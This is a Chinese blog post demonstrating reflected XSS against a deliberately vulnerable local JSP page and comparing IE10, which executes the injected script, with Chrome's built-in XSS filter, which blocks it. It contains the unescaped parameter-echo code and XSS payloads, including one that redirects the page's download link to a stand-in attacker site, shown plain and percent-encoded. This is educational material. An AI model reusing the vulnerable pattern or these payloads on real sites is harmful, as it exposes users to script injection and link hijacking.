标签:style blog http io color ar os 使用 java
偶然发现!
下面是一个非常简单的jsp页面:
<%@ page language="java" contentType="text/html; charset=ISO-8859-1" pageEncoding="ISO-8859-1"%> <!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd"> <html> <head> <meta http-equiv="Content-Type" content="text/html; charset=ISO-8859-1"> <title>Hello World!</title> </head> <body> <%!private int accessCount = 0;%> <H2> Accesses to page since server reboot: <%=++accessCount%></H2> <% out.println("<a href=\"http://www.cnblogs.com/magialmoon/\">Click to Download</a> <br />"); String name = request.getParameter("name"); if (name != null) { out.println("Welcome " + name); } out.println("<script>alert(\"attacked 1\")</script>"); %> </body> </html>
浏览器输入:http://localhost:8080/security-web/xss.jsp?name=zjd会输出下面页面:
现在我们模拟一个最简单的XSS攻击,在浏览器敲入:http://localhost:8080/security-web/xss.jsp?name=<script>alert("attacked!")</script>,先试下IE(IE10):
bingo!!!
再来看看Chrome的表现吧:
正常弹出了ok,并没有被攻击。为什么呢?看下网页源码就立刻明白了:
Chrome已经对参数进行过滤了,防止XSS攻击。而且比较智能,如果下面有和攻击一样的语句也会被屏蔽,比如把上面链接中的"attacked!"换成"ok":
更贴心的是,当你从Chrome地址栏copy带有潜在xss攻击的链接时,它会自动进行转义,比如上面的链接:
http://localhost:8080/security-web/xss.jsp?name=%3Cscript%3Ealert(%22attacked!%22)%3C/script%3E
另外,一般的XSS攻击会对链接进行简单的ASCII编码,比如再浏览器输入下面的地址会篡改页面的下载地址:
http://localhost:8080/security-web/xss.jsp?name=<script>window.onload = function() {var link=document.getElementsByTagName("a");link[0].href="http://attacker-site.com/";}</script>
同样进行简单的编码后可能是这样的:
http://localhost:8080/security-web/xss.jsp?name=%3c%73%63%72%69%70%74%3e%77%69%6e%64%6f%77%2e%6f%6e%6c%6f%61%64%20%3d%20%66%75%6e%63%74%69%6f%6e%28%29%20%7b%76%61%72%20%6c%69%6e%6b%3d%64%6f%63%75%6d%65%6e%74%2e%67%65%74%45%6c%65%6d%65%6e%74%73%42%79%54%61%67%4e%61%6d%65%28%22%61%22%29%3b%6c%69%6e%6b%5b%30%5d%2e%68%72%65%66%3d%22%68%74%74%70%3a%2f%2f%61%74%74%61%63%6b%65%72%2d%73%69%74%65%2e%63%6f%6d%2f%22%3b%7d%3c%2f%73%63%72%69%70%74%3e
这点小伎俩同样难不倒Chrome,相比之下用IE一测试,高下立见。
一查原来这是webkit的功能:http://www.zhihu.com/question/20941818。
PS:知乎上还有一个说Chrome的问题挺不错http://www.zhihu.com/question/20564451,一直使用Chrome,最喜欢它简单的界面,配上Google:
标签:style blog http io color ar os 使用 java
原文地址:http://www.cnblogs.com/magialmoon/p/chrome-xss.html